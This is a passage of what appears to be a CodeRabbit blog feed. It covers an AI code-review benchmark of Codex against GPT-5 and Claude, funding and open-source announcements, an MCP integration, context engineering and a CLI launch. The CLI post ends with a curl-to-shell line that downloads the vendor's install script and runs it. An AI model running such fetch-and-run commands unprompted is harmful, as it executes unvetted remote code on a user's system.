genuine critical or major bug (like a use after free, double free, lost wakeup, memory leak, null deref, path traversal, catastrophic regex) are also Important. Everything else is Minor. ## **Scoreboard - Codex improves signal-to-noise** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/337f396f423d63deda780f37275df808b6c1e8732255f730d8b870e251537b89_35e54bb5f7.png) **Takeaway:** Codex finds essentially the same EPs as GPT‑5 but does it with fewer, tighter comments, so the signal-to-noise ratio is improved. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/64871e695a5dba0ff7c756779d8974487e91c94ea12c5dfa7a1f4dec7fe09299_0119d66acc.png) **What this means:** Codex covered 20 of the 25 PRs (the other 5 count as uncovered fails). Despite fewer comments overall, Codex passed slightly more EPs (16 vs. 15) and landed far more Important comments. Over half its comments are either direct hits on the issue we were representing in that PR or flag other EP critical bugs. GPT‑5 and Claude trailed in precision and Importance share at about 40%. **The verdict: Same EP coverage, less noise:** Codex retains GPT-5’s bug finding power but trims the chatter with about 32% fewer comments than GPT‑5 (54 vs. 79) and about 35% higher per comment precision (46.3% vs. 34.2%). Claude looks similar to GPT‑5 on coverage but is chattier, with lower precision. ## **Style and structure (why Codex reads like a patch)** Codex replies are consistently action forward (diffs almost always included) and low hedge. That lines up with what reviewers want: suggestions that translate directly into a patch. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b88774d9af028d2604ca7cdffae2a793244149ea29bdeaaef065a1c36b0d522f_bc96f14bb9.png) ## **The kinds of bugs Codex is good at** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cda620117d7bfcd6beda7e2b40ade94a4644917e35af621e69bdc19a289db716_ac3d2e7243.png) Across the suite, all models did well on concurrency and synchronization, but Codex stood out for: 1. **Condition variable misuse and lost wakeups.** Codex proposes the canonical patterns (wait under lock, check predicate in a loop) and supplies concrete diffs. 2. **Lock ordering and deadlocks.** It calls out inconsistent acquisition order and suggests a lock hierarchy or moving work outside critical sections, again with actionable edits. 3. **Subtle API and performance traps.** Examples include catastrophic regex backtracking and memory model orderings. Codex pinpoints and patches them cleanly. ## **Why GPT‑5 felt noisier, and how we fixed that** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f6a9601e10306e26d2f8916a9efc9a012118bea8ae7f57e8336594671ed0def0_6d4d9d9c1f.png) **What we saw:** When we moved from Sonnet and Opus to GPT‑5 our total comments per review nearly doubled. Even though hallucinations fell to under 1% and negative tone fell to under 1%, the acceptance rate (share of comments judged helpful) declined significantly relative to its baseline prior to the adoption of GPT-5. **What changed with Codex:** With GPT‑5 Codex plus some product changes we’ve implemented, our acceptance climbed back to prior levels while overall comment volume stayed higher than the pre-GPT‑5 era. Put simply: our tool is now back to its prior helpfulness level, while still finding as many real issues as GPT-5. Two product levers helped with this: 1. **We created severity and review type tags, front and center** * **Review Types:** We created review types to allow users to self-select what kinds of comments they wanted to read including: ⚠️ Potential issue, 🛠️ Refactor suggestion, 🧹 Nitpick (nitpicks are hidden unless you opt into *Assertive* mode) * **Severity:** We now tag comments by severity to better signal which matter more than others. Our tags are: 🔴 Critical, 🟠 Major, 🟡 Minor, 🔵 Trivial, ⚪ Info * We always show bugs (Critical, Major, Minor) but don’t always show other types of comments. Refactors show only if the model marks them as essential. Users who want everything can still switch to *Assertive* mode. 2. **We implemented stricter filtering and aggregation** * We collapse duplicative notes and filter out “nice to have” suggestions unless they have clear ROI for the user. The result: fewer, denser comments, and fewer reasons to tune out. ## **Latency: Fast matters & Codex is faster** A five minute review is fine. Thirty minutes is not. GPT‑5’s “always think hard” style significantly increased time to first token and overall review time. But we shipped several pipeline optimizations recently and Codex helps further reduce the latency that GPT-5 introduced. Codex’s variable or elastic thinking uses less depth when it is not needed, improving time to first output and end-to-end review time in practice. Net: faster reviews, earlier feedback, better flow for the human in the loop. ## **What a CodeRabbit user should expect** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/599a7580793d7f8792ea58e0eea3f29c46bf53b7e35743c0508df1070adcff54_d5bc57b4b6.png) Now that Codex is implemented, how will that change your AI code reviews? 1. **The same raw bug finding power** * On the refreshed hard 25, Codex passed 64% at the EP level vs. 60% for GPT‑5 (our [previous set of PRs](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) had GPT-5 passing 77.3%). No loss of the important wins GPT-5 helped with. 2. **Fewer but stronger comments** * About 32% fewer total comments than GPT‑5, with about 35% higher SNR (per comment precision). More patches, less prose. 3. **Severity tags to focus your review** * Critical and Major issues float to the top with our new severity tags. Refactors are gated. Nitpicks are opt-in. You will spend less time scanning comments and more time fixing. 4. **A faster feedback loop** * Codex’s leaner reasoning plus pipeline improvements bring time to first helpful comment down. You will feel it. ## **Quantitative appendix (for the curious)** We know you love data! Here’s some other stats we found interesting: * **Per comment precision (SNR) uplift:** Codex 46.3% vs. GPT‑5 34.2% — about +35% relative. * **Comment volume delta:** Codex 54 vs. GPT‑5 79 — 32% fewer comments, with EP passes essentially unchanged (16 vs. 15). * **Style:** Codex includes diffs in 94% of comments and uses hedging far less than Claude and GPT‑5 on this set. * **Acceptance (real world):** During GPT‑5 rollout, acceptance dropped significantly. With Codex plus changes, it rose by about 20–25% relative and returned to prior levels while still delivering more accepted comments than pre GPT‑5. ## **Where Codex still needs work (and what we are doing)** These improvements are great but that doesn’t mean that there aren’t still issues with Codex. Here are some that we are actively working on: * **Coverage gaps.** When a model leaves no comment on a PR, that is a hard fail for that EP. We are widening Codex’s search heuristics so it is less likely to miss entire classes of issues. * **Refactor over eagerness (tuned, not solved).** The “essential only” gate curbs refactor noise, but we will keep tightening the threshold, especially on large diffs where a high number of comments would be overwhelming. * **User driven prioritization.** We cannot change GitHub’s in-line ordering, but we annotate every comment with severity so you can triage from the top down without hunting. ## **Codex GPT-5: All of the great bug catching ability, fewer downsides** Our north star is simple: **catch the bugs that matter, quickly, without making you sift through noise**. Codex helps us do that. It keeps the bite of GPT‑5’s reasoning while restoring SNR and shaving latency down significantly. We will keep measuring, improving, and shipping a better product every release.

We raised $60 million last week… so we made a funny video

Aravind Putrevu — Tue, 23 Sep 2025 00:00:00 GMT

Last week, we announced CodeRabbit’s **$60 million Series B**. To celebrate, we did what any responsible, developer-focused software company would do: we made a funny video. Not with *all* the money, to be clear. But we did decide to celebrate with something fun, absurd, and painfully relatable for any dev team trying to keep up with the flood of AI-generated PRs. ## **Introducing… “When AI coding agents backfire: A short film”** %[https://youtu.be/glfB3KLQR7E?feature=shared] It’s a short mockumentary-meets-sitcom about what really happens when “AI velocity” turns into a PR review backlog. * One reviewer. * Dozens of notifications. * 84 open PRs. * And one overly eager coworker named Brad who just wants feedback. ## **The cast** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3535b9bef51f5780d56cda4892b3045a1e3fcaf34ddef8adc8a6886dfee0596f_6abc6f5a35.png) To bring it to life, we pulled in beloved developer educator (and influencer) [**Aaron Francis**](https://x.com/@aarondfrancis) to star as our beleaguered reviewer. He’s the guy who just wanted to ship features faster and now can’t go to the kitchen (or even leave his house at 8 a.m.) without Brad asking about his PR. And speaking of Brad: the inimitable [**Austin von Johnson**](https://www.instagram.com/4ustinvon/?hl=en) plays him to perfection. Brad’s a developer who can crank out AI-generated PRs at lightning speed but cannot, under any circumstances, *wait patiently* for a review. His lurking, his post-its, his hoodie PR ambushes… let’s just say he was perfectly committed to the bit. ## **The very real problem behind the joke** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/404fdfebb47225ce911bd175298de3c83ca77b756679fc58fe004d5311e2a100_f64fbc7d2f.png) The short film is funny, but the problem it highlights is real: * **AI coding tools crank out code faster than teams can review it** * **Review backlogs balloon** while productivity drops * **Senior engineers get buried** in endless PRs * Review quality is uneven, risk goes up, and you have to deal with more issues * And suddenly, the promise of velocity feels more like a nightmare. ## **Here’s what we’re doing about it** CodeRabbit exists to **clear the backlog**, not add to it. Our AI code reviews pull in dozens of points of context (requirements, tests, CI, past diffs, ownership) to catch bugs you’d miss, reduce reviewer fatigue, and move PRs through faster—without turning teammates into… Brad. Ship faster, review smarter, and keep your sanity. Also, avoid creating a… Brad. 👉 [Watch **“When AI coding agents backfire: a short film”** right here.](https://youtu.be/glfB3KLQR7E?feature=shared) And if you’ve ever been chased around the office about a PR, please, send it to your team’s Brad.

CodeRabbit commits $1 million to open source

Aravind Putrevu — Thu, 18 Sep 2025 00:00:00 GMT

Open source is the foundation of modern software development. From package managers and developer tools to frameworks and infrastructure, open source projects power nearly every piece of software we use today – including CodeRabbit itself. These projects are built and maintained by communities of developers who dedicate countless hours to keeping them alive, secure, and evolving. Today, we’re proud to announce a **$1 million USD commitment to open source software sponsorships**. This commitment comes on the heels of our **$60 million Series B funding round** and it reflects both our gratitude for what open source makes possible and our belief in the importance of investing in its future. ## **Why open source needs support now more than ever** Generative AI is transforming software development, but it’s also putting new pressures on open source maintainers. Alongside the surge of high-quality contributions, there has been a sharp rise in **AI-generated PR spam**: repetitive, low-quality, and sometimes insecure code submissions that overwhelm project maintainers. We’ve heard firsthand from maintainers about how draining this flood of noise can be. At CodeRabbit, we’ve built tools that **filter out spam, elevate code quality, and reduce maintainer workload** by blending AI-driven code review with human oversight. We’ve made our AI code review tool free for use on all open source projects (more about that here). But tools alone aren’t enough—sustainable open source requires financial support, recognition, and stronger bridges between communities. ## **From $200K to $1M: Deepening our commitment** Earlier this year, we announced a [**$200,000 pledge to open source**](https://2025.allthingsopen.org/pledging-support-for-open-source), supporting projects like: * **pnpm**: A disk-space–efficient package manager * **Biome (biomejs)**: A next-generation linter and formatter for JavaScript and TypeScript * **AST Grep (Herrington Darkholme)**: Structural code search for smarter code analysis * **iTerm2 (George Nachman)**: A terminal emulator that redefined developer workflow * **Markdown Lint (David Anson)**: Ensuring docs stay clear and consistent That pledge was only the beginning. With our new Series B funding, we’re scaling our support to **$1 million**, ensuring that more projects and maintainers across the ecosystem receive the recognition and resources they deserve. [**Apply for sponsorship here.**](https://coderabbit.link/oss-progam-submission-form) ## **CodeRabbit & OSS: Building bridges across the OSS ecosystem** Sponsorship is only part of the story. Many of the challenges open source faces—sustainability, security, and developer burnout—aren’t isolated to a single project. They stretch across communities and ecosystems. That’s why CodeRabbit is also working to **connect maintainers, foster collaboration, and share solutions across projects**. Whether through joint sponsorships, shared initiatives, or community-driven tooling conversations, we aim to strengthen the ecosystem as a whole rather than supporting it in silos. If you’re a maintainer or contributor who wants to join these conversations, we’d love to hear from you. Join our Discord to connect with the CodeRabbit team and other open source leaders. ## **Free CodeRabbit access for open source projects** Finally, a reminder: **CodeRabbit is free for open source**. Every maintainer, contributor, and community can use our platform to cut through PR noise, automate code quality checks, and free up more time for meaningful contributions. ***Learn more and*** [***apply for funding here.***](https://coderabbit.link/oss-progam-submission-form)

CodeRabbit’s MCP integration = Code reviews that see the whole picture

Edgar Cerecerez — Wed, 17 Sep 2025 00:00:00 GMT

Every dev team knows the pain of code reviews if performed in isolation. An AI tool (or even a teammate) can comment on syntax, style, and patterns, but without business requirements, deployment dependencies, or organizational knowledge, it’s just guessing at half the story. CodeRabbit currently has a number of native integrations including Linear, Jira, and Circle CI. We have seen the value that context from those tools provide to code reviews. That’s why we’re excited to announce the GA of **CodeRabbit’s integration with MCP servers**. This will allow you to bring in even more context into your reviews. With this launch, we become the first AI code review platform that orchestrates context from across your entire development ecosystem from business requirements in Confluence to system dependencies in your CI/CD pipeline to data from any internal MCP servers. All to provide code reviews that actually understand what your code is trying to accomplish. **Start your 14-day trial →** *Get context-aware reviews that reference your actual team standards in ~10 minutes.* ## **Why MCP for AI code reviews?** Development teams operate across dozens of tools: * Requirements live in Linear * Design specifications exist in Figma * Architectural decisions get documented in Confluence * Security standards evolve in internal wikis after each audit AI code reviewers start with basic context: your codebase, some coding guidelines, maybe a few integrations. They analyze syntax, check patterns, and suggest improvements. But they miss the context that determines whether code actually works for your team. As a MCP client, CodeRabbit acts as a compiler for organizational context. It takes high-level inputs - your wikis, tickets, deployment patterns - and compiles them down into precise, actionable code review insights. Instead of bloated integrations or brittle hacks, MCP lets clients like CodeRabbit pull in just the right data from your MCP servers from places like your Linear tickets, Confluence docs, Datadog metrics, or Slack discussions. ## What it looks like in practice… CodeRabbit searches connected MCP servers before starting a review. For example, database schema changes might get checked against data architecture documents. API endpoint implementations might get verified against service design patterns documented in internal wikis. **Example: CodeRabbit verifies code consistence** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2d107fbb8fc56d5a027bdf750f5902341f7ac2abe06eed3d7ad369a77805daee_f12aac823d.png) ## Bring in the context matters to you… from any tool ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8c5f8bafae2d598ecb5310772ba14b45a9b60b1cc3ffa42e137ee35fad1cba9e_6eddc08aa1.png) Traditional code review tools require specific integrations. CodeRabbit's MCP integration works with any system with an MCP server. Your proprietary internal tools, boutique SaaS platforms, custom documentation systems. If there's an MCP server, CodeRabbit can connect. With CodeRabbit as an MCP client, you’re reviews gain depth from bringing in three different types of context. ### **Technical context.** * Think dependencies, performance data, static analysis, and test coverage. * **Native integrations:** GitHub Actions, GitLab CI, Bitbucket Pipelines * **MCP Servers:** Datadog, New Relic, SonarQube, Snyk, Grafana * Example Review Comment: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7adc999bc75ec754135830427317a4a7e16c0dab25bb4010f188581d66e333aa_4f1b4d0ea7.png) ### **Business context.** * This includes things like requirements, user stories, and acceptance criteria. * **Native integrations:** Linear, Jira, GitHub Issues, GitLab Issues * **MCP Servers:** Confluence, Notion * Example Review Comment: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/82bf747262be78dd2a827283a621ea4eabe63a1ca1681acd77947f7f225eb64e_c2a10749dc.png) ### **Organizational context.** * We also pull in things like prior decisions, conventions, meeting notes, and institutional knowledge. * **Native integrations:** PR history, Team conventions * **MCP Servers:** Slack, Microsoft Teams, Stack Overflow for Teams, PagerDuty * Example Review Comment: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ad1c1707c7ced1bf966a0f582bf99244a58cbc76a91290c5fb6f9786d61b530e_5dc604550d.png) ## **Getting started with MCP integration** Setting up CodeRabbit's MCP client requires minimal configuration. Most development teams can connect their first MCP server in under 10 minutes. **Popular development tools with MCP server support**: * **Linear** (native MCP support, 5 minutes) * **Notion** (MCP server available, 10 minutes) * **Confluence** (community MCP server, 15 minutes) * **Figma** (MCP plugin available, 10 minutes) Define which code changes should search which development systems. Database changes check architecture documentation. Authentication changes check security documentation. Adding an MCP server is easy: 1. In the CodeRabbit dashboard, head over to integrations > and toggle to the MCP Servers tab if needed ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a1316478eb68c7d3d64f1f4423305ccc40407e67bc4634aad25ce633e331ff06_707e8c2ec5.png) 2. You can click on one of the pre-configured MCP server options or the New MCP Server button to add other MCP servers. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dbbb366a1f958f18a6e27c591ce8060200f1dc8ee0b200d124b60a6c4a118ae9_fc521eb479.png) 3. For MCP servers not on the list, enter the relevant credentials. 4. Note the usage guidance which serves as context for how the MCP information should be used. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7eb39133a5e122b798242e57c0562cecac1d5770df66d1a719192b73ee60502f_2f32910e23.png) 5. Once connected. You can see the available calls and hover over them to see more details. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1edda093cd5cb5c55f76e2c36ca82c725e533c5271e082c150307723b98297aa_8fe9bc43ee.png) 6. You can also click on each call to enable/disable access. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4ec027c44cf6da4988d1101c09561784ace2be4584aaef18883be29dcb87ea0b_85cd463156.png) > Note: All MCP Server queries are ephemeral. CodeRabbit processes them in real-time with zero data retention. ## **A review platform that brings in all your context** CodeRabbit works out of the box with 50+ integrations. With MCP, you can extend it to your custom servers and internal tools. Start with the systems you already use — Linear, Confluence, Datadog, Slack — and add more as you go. ### **Next steps:** 1. [**Start a 14-day trial**](https://app.coderabbit.ai/login???free-trial) 2. [**View MCP server directory**](https://app.coderabbit.ai/integrations) 3. [**See the MCP docs**](https://docs.coderabbit.ai/context-enrichment/mcp-server-integrations)

Handling ballooning context in the MCP era: Context engineering on steroids

Tommy Elizaga — Wed, 17 Sep 2025 00:00:00 GMT

Once upon a time, getting context into an LLM meant stringing together hacks, prayers, vector strategies, and overly complex RAG pipelines. Then came the **Model Context Protocol (MCP),** a clean, modular way to serve external data to models in production. It quickly became the protocol of choice for anyone building agentic systems that are trying to actually *do* things. Every tech company is now launching MCP functionalities – and for good reason. MCP separates context logic from application logic, improves reliability, and helps tame the chaos of prompt construction in complex workflows. We’ve been deep in the context engineering space for a while, and as we launch our own MCP client, we’re genuinely excited by how it lets us inject richer context into our code reviews. But let’s be honest: with great context comes great risk. Because here’s the dirty secret of the MCP era: **most of us are now drowning in the context we used to beg for**. More logs, more traces, more diffs, more "relevant" files and way less clarity about what the model actually needs. What starts as helpful input quickly turns into token bloat, noise, and degradation in model performance. Think hallucinations with citations, latency spikes, or reviews that read like they were written by an over-caffeinated intern who rambles. Good context engineering isn’t about cramming in *everything*, it’s also about knowing what to leave out. And in the aftermath of MCP, that balance is harder (and more important) than ever. In this article, we’ll break down the **ballooning context problem**, what happens when well-intentioned context goes rogue, and how we’re tackling it head-on. If you’re shipping LLM-based features with MCP and want to avoid accidentally building a prompt-shaped black hole, this blog is for you. ### **The “Ballooning Context Problem” with MCP clients & servers** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6ed2fa6b0c7de4c2c195d9619db5cb3c900d272937517f2740357e3687f1f917_0f05c0c16a.png) MCP servers and clients make it easy to hand models a firehose of information: logs, traces, diffs, configs, tickets, and sometimes even that dusty corner of the repo nobody remembers owning. It’s all right there at the model’s fingertips. But here’s the question: is more context always better? Definitely not! Too much context is like cramming for an exam by reading the entire library. You end up with noise, not knowledge. And when context goes unchecked, three problems show up fast: * **Token bloat.** LLMs don’t have infinite stomachs. Input windows are expensive and finite, and stuffing them full of “just in case” details means higher costs, slower throughput, and wasted budget on irrelevant text. * **Relevance decay.** More information doesn’t mean better outputs. In fact, it often means worse. Irrelevant or redundant snippets dilute the signal, and the model starts chasing tangents instead of insights. * **Latency.** Every extra log, diff, or stack trace has to be fetched, processed, and shoved into the prompt. Context building becomes the bottleneck, dragging review speed down to a crawl. In short, ballooning context turns the elegance of MCP into a liability. Without deliberate context engineering, the very thing meant to sharpen outputs can just as easily smother them. ## When context hurts ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1ae392beedab9bb254ebeddd0dec021bba79702c217de5a8578c01e12a00ccdf_bffbbd118e.png) In practice, we see three common pathologies: * **Context confusion.** This happens when the model latches onto irrelevant detail and treats it as signal. Imagine a pull request that updates authentication logic but the context dump also includes unrelated test fixtures. The model might start reviewing the fixtures instead, producing comments that feel informed but have nothing to do with the actual change. * **Context clash.** Not all context agrees with itself. Suppose a code review includes both the latest schema migration and an outdated docstring that contradicts it. The model now has to “choose” which source to trust. Often, it hedges, producing muddled reviews that cover every angle without real confidence: the LLM equivalent of a reviewer who can’t commit. * **Context poisoning.** The most insidious case is when bad information makes it into the context. A hallucinated “related file” or a mis-indexed snippet gets injected, and suddenly the model is citing non-existent code. In a review, that looks like a comment about a bug in a file that doesn’t exist, confusing developers, wasting time, and eroding trust. And it’s not just code reviews. The same pitfalls show up anywhere context gets overstuffed: customer support bots pulling in irrelevant tickets, research assistants distracted by tangential papers, or security agents treating noisy logs as hard evidence. In each case, the wrong context is worse than no context at all. ## Key patterns to combat context overload with MCP servers ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2bbed472e92f41bc76636475e6887b3713952af987a91772bc4a0393cf900b79_d92b95cbd9.png) If the problem of the MCP era is ballooning context, the solution isn’t to stop piping in information — it’s to curate, compress, and serve it with intent. MCP context should be treated as raw material that goes through a well-designed data transformation process before it ever reaches the model. For our own MCP client for code reviews, we’ve leaned on a set of patterns that keep context high-signal and low-noise. * **Context deduplication and differencing** Redundant inputs are the fastest way to waste tokens. Identical stack traces, repeated log lines, or unchanged sections of a diff don’t need to appear ten times. Our client identifies duplicates, collapses them, and highlights only what’s new. The same principle applies in other domains: collapse duplicate customer tickets, compress recurring traces, and reduce context to delta rather than bulk. * **Context summarization pipelines** Sometimes raw MCP output is still too big. Here, LLMs themselves can help by summarizing retrieved context into something smaller. The tradeoff is compression vs. fidelity: a summary might miss nuance, but the alternative is a model drowning in detail. In practice, we use hybrid designs: raw diffs for high-priority files, summaries for less-critical context. * **Context prioritization and truncation** Even after pruning and summarizing, you still need to decide what goes first, what can be deferred, and what gets dropped if there isn’t room. Setting a token budget per MCP query is critical, or else prompts will balloon unpredictably. We’ve experimented with truncation-aware designs; sometimes front-loading summaries for quick orientation, other times end-loading detail for deep dives. The “right” design depends on the workflow and the model’s feedback loop. * **Context quarantining** Not every piece of context belongs in the first prompt. Subtasks should carry their own dedicated context threads, so the model sees exactly what it needs when it needs it. For example, in our MCP client, test failures live in a dedicated review sub-thread rather than clogging the main review context. This approach reduces confusion and helps preserve clarity across long interactions. * **Iteration and learning** Context engineering isn’t static. We use model feedback and human-in-the-loop corrections to tune priorities over time. Observability is key: logging actual prompt inputs, broken down per module, lets us see what’s getting through and what’s wasted. Tooling like MCP dashboards or token heatmaps can highlight where budgets are blown or irrelevant inputs are sneaking in. ## **Anti-patterns to avoid with MCP servers & clients** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cbbe88cd19523c19edb2413b1ff69d527e8f0ef9576cfa772baa146acc7f1023_c84cf773af.png) The MCP era makes context retrieval easy. Maybe *too* easy. A couple of common anti-patterns are worth calling out: * **Blind vector stuffing** Vector databases are great at surfacing “relevant” chunks of information, but treating them as an oracle is a recipe for trouble. Stuffing in every vaguely related snippet means you get reviews full of tangents: comments about files that weren’t touched, or nitpicks based on stale code. Context irrelevance doesn’t just waste tokens — it actively drags down model performance by pulling attention away from the real task. * **“Just give it everything”** The brute-force approach: dump every log, diff, and docstring into the context window and pray. This guarantees high costs, long latencies, and unpredictable results. The model can’t tell which parts are critical and which are fluff, so you end up with bloated reviews that read like they were written by an overeager intern trying to cover every angle. Worse, when contradictions sneak in, the model hedges or hallucinates to reconcile them. In short: more context isn’t always better. Without filtering, prioritization, and careful design, “everything” quickly turns into noise that makes the system slower, dumber, and more expensive. ## The approach we took with our MCP client In the MCP era, context is king. But let’s be honest: sometimes it’s a king that’s had one too many and can’t tell up from down. The challenge isn’t getting context anymore; it’s taming it. Great context engineering requires careful transformation pipelines, ruthless prioritization, and the humility to keep iterating. Done poorly, you get token bloat, latency, and reviews that sound confused. Done well, you get sharper outputs that scale with your workflow. We’ve seen this firsthand in our own MCP client for code reviews. When testing, we initially passed full logs and entire file sets straight through. The result? Expensive reviews that rambled more than they helped. Once we introduced deduplication, summarization, and task-specific quarantining, review quality jumped. Instead of commenting on everything, the model zeroed in on real cross-file risks, while token use and latency both dropped. That’s the payoff of good context engineering: reviews that feel informed, not bloated. And that’s what we’re building toward with our MCP client. ***👉 Ready to see context done right? Start your*** [***14-day trial***](https://app.coderabbit.ai/login???free-trial) ***of our AI code reviews.***

CodeRabbit CLI - Free AI code reviews in your CLI

Edgar Cerecerez — Tue, 16 Sep 2025 00:00:00 GMT

CodeRabbit started with AI-powered code reviews in pull requests. In May, we brought that same intelligence to [VS Code, Cursor, and Windsurf](https://www.coderabbit.ai/blog/ai-code-reviews-vscode-cursor-windsurf). Now, we're extending the AI code reviews developers love into the command line with CodeRabbit CLI. In case you’re wondering, that makes us the most comprehensive AI code review tool available. We work everywhere you work. *CodeRabbit CLI* helps devs perform self-reviews of code directly in their terminal. By providing automated, intelligent code analysis capabilities, it empowers developers to catch issues early, maintain consistent code standards, and make coding autonomous through seamless integration with AI coding agents in the CLI. ## **Vibe checking your code – now in CLI** %[https://youtu.be/IqBKf4u5MtA] CodeRabbit CLI delivers the same comprehensive analysis that makes our PR and IDE reviews effective at catching bugs early. CodeRabbit CLI is free to use with rate limits but with a Pro plan you can enjoy much higher limits and additional features, including: * **Context-aware analysis**: Leverages your Git integration to synthesize insights from 40+ sources including static analysis tools, security scanners, and our codegraph relationship feature for the most comprehensive reviews. * **Pre-commit reviews**: Analyze changes before they leave your machine for multi-layered reviews. * **One-click fixes**: Apply simple fixes instantly or send complex issues to AI agents with full context hand-off. * **Coding guidelines**: Auto-detects agent.md, claude.md, Cursor rules, and other coding agent configuration files. ## **CodeRabbit CLI: Works everywhere, with everything** Terminal-native means CodeRabbit CLI works with: * **Any Terminal App/IDE:** iTerm2, Ghostty, Neovim, Lazyvim * **Any AI Coding CLI agent**: Claude Code, Codex, Cursor, Gemini, OpenCode and more ## **How to use CodeRabbit CLI with AI Coding Agent CLI** The CodeRabbit CLI opens up new integration possibilities with AI coding agents. Here's how it works with Claude Code: 1. While working on a coding task, you can prompt Claude Code to use CodeRabbit and to fix any issues it finds. This is particularly useful if it’s coding from a PRD, or a tasklist. ```plaintext Please implement phase 7.3 of the planning doc and then run coderabbit --prompt-only, let it run as long as it needs (run it in the background) and fix any issues. ``` ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6b657cafb962e0c9812ea96f5d71ba550c465557996afd1bf85715563295d2ef_1bb2356c5d.png) 2\. Claude Code will carry on the coding task and run `coderabbit --prompt-only` in the background. It may setup a timer interval to check on CodeRabbit. Alternatively, you can also prompt Claude to check if CodeRabbit is complete. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e68a7c3f44a1170911f8bb1db24d3fba73f4e140b23b11b404f4d9d0d689a40c_1e7e21da00.png) ![CodeRabbit running in the background within Claude Code](https://victorious-bubble-f69a016683.media.strapiapp.com/eb21a580e8e0628ace6d925edcf6d77821827e92ed4b3aa97e343a1b8d2e4085_a68d41df53.png) 3\. Claude Code will then read the output of CodeRabbit which, by using the `--prompt-only` flag, provides the output as plain text with prompts for AI agents to read. Claude will then create a tasklist addressing each of the issues surfaced by CodeRabbit. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/725bfbbcaf2f566904fd932c98d42688933e3e0cef13878e63e0941dc0cccdf0_85c2b545bb.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6b4991bb35c42f9bdd56311e414e69d5750a7e087bbb1130353a513898a7efe3_69dd684673.png) For Claude Code integration and automated workflows, check the [CLI documentation](https://docs.coderabbit.ai/cli) [for setup.](https://docs.coderabbit.ai/cli) The CLI has two modes: interactive and plain response , making it easy to integrate into automated workflows or pass results to other tools. ## **Getting started** CodeRabbit CLI is available now. Install and try your first review: ```powershell #install CodeRabbit curl -fsSL https://cli.coderabbit.ai/install.sh | sh #Run a review in interactive mode coderabbit ```

Raising our $60M Series B: Building the quality gates for AI-powered coding

Harjot Gill — Tue, 16 Sep 2025 00:00:00 GMT

When we started CodeRabbit, the idea was pretty simple: since all developers hate code reviews, why not make them faster and easier? After all, no one enjoys leaving the same comment about variable naming practices or style conventions for the tenth time in a week. That’s where we believed AI could help – it could automate best-practice checks and policy enforcement so that devs didn’t have to do it themselves. But more importantly, it could act as a safety net, catching issues and bugs before they made it into production. With that belief, we set out to [create something new: AI code reviews.](https://www.coderabbit.ai/blog/coderabbit-announces-16m-series-a-funding-led-by-crv) Over time, AI coding tools started to gain broader adoption. Tools like Copilot, Claude Code, and Cursor began spitting out more code than teams could easily review with many developers increasing the number of PRs they shipped by 2x to 3x. This added to the existing code review backlogs many teams had. We quickly realized that the ‘efficiency’ gains being marketed to engineering teams would swiftly turn into code review bottlenecks. And that’s also when we first realized how critical AI code reviews would be to development teams. They would function as a trust and governance layer in agentic software development ensuring quality and security while saving devs time. And, as an added bonus, greatly reducing passive aggressive review comments in the workplace! ## **AI code reviews became essential in 2025** %[https://youtu.be/UHCTKZYOOYU] Over the last two years, we’ve built the most comprehensive and context-rich platform for code reviews, been installed on 2 million repos, reviewed 13 million pull requests, become the most installed AI App on both GitHub and GitLab, and improved the morale of countless dev teams. In 2025, we watched AI code reviews become essential for all teams dealing with the challenges that come with the broad adoption of AI coding agents. But that shift fueled a year of unprecedented growth, culminating in the **$60 million Series B round** that we announced today. This investment was led by **Scale Venture Partners** with participation by **NVentures (NVIDIA’s venture capital arm)** and support from our long-time investors **CRV, Harmony Partners, Flex Capital, Engineering Capital, and Pelion Venture Partners**. With this new funding, our total capital raised is now $88 million. ## **Why so many teams are adopting AI code reviews** When every developer on your team is generating code faster, your review queue grows exponentially. Senior engineers who used to review 5 to 10 PRs a day are now facing 20 to 30. The math doesn't work. Teams are caught between two bad options: either slow down deployment cycles waiting for thorough reviews, or rush reviews and let quality slip. This is why AI code review adoption is accelerating. AI reviewers augment the human reviewers, freeing them to focus on architecture decisions, business logic, and the nuanced feedback that requires context AI can't fully grasp yet. The past year has been a whirlwind. We’ve 10x revenue and doubled our team thanks to: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/83b876a29aa62aff658ecd093bc0499499e7894527aca4990f8d99363c143588_19daad5aab.png) Behind each of those customers are real teams who tell us the same thing: reviews are faster with CodeRabbit, bugs are caught earlier, and release cycles are finally speeding up again. Groupon told us they went from 86 hours from review-to-production down to just 39 minutes. Another shared that they cut down the time they spend on code reviews by 70%. ## How CodeRabbit works CodeRabbit works because it fights AI fire with AI fire. Our platform brings in dozens of points of context to deliver the most context aware reviews to: * Catch correctness and security issues before they hit production. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/09dd19929fe255ab4224435de23cd4b7937a944524bf48c0d2b18c696ed7f4c8_afa5e8575c.png) * Enforce organizational best practices and custom policies. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/eea5213a5babb9ea35de5cd7f1076b95d7b7ba6ce159f36f912424666d1c781e_5753201002.png) * Support the full merge cycle with unit testing and docstrings generation. 